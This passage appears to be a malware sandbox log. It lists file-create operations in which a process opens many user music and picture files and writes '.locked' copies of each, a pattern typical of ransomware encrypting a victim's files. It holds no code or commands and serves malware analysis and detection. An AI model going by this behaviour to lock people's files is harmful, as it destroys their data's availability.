| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\4kMPOQ1co0CdpuvydAl\Z-c0IkpuKEU4ZDyc.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\dVgzNIdTk 5.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\teqoN4jU-y3YF67\SBfIQPT7amcdJcry.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\B9FVT.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\JBSN_Faye.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\Oq0x e.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\pKXeHdgfssh.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\tjx9MJXctDgn1Dq76.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4esxN8pKjnEvYdBK\VaUAf.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\uVZhvi8U5nCUB\MtYvOI2Uzug.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\4uV9tl5.wav.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\8hE0b6s ArvRBw.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Music\PLFZxgHohNR10KDihD.mp3.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\-8RT0w\3Dqr7X4TbE3uxMSPUw.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\8mWncDWtB.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\chIug8rBWXt9\wIwHDgO.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\O3zg.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\sCUv8_kRUe5bgN.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RUc0QdC3qJl9uyT\_l6DV0mZ.gif.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\4slC.gif.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\D2YLhTMM0CMWDnL8em4n.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\RhZqWzl_annQ3vL\RERUddz09.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\EeZrOX.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\5k2wQi7\tcaPXS3LM1q3.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\4Z9P2gORwA49Z.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\241cg6PKYc\b7_rJbY9gnpZj\Qubd3Svl7n.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\mVU-yPTycTqAT65We.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\S-V0K7xKBR3hd1x.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\S cIA1W\ULtQg.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ODQj\0PlTB1uKLPnEYzJA.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\aXKrfvt-uNL-P5IK.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\GG51x-IiE6IWi6smhn6X.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\hNXBhfyvUVDA.png.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\v4uFQ3drCrneJS8a8Q.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\to4MBrs\Xm1OG.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\l0z1bU3ROdKknR1kvU.png.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\lU2P3BA.jpg.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\S6Q h1o99wFndWp.bmp.locked | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
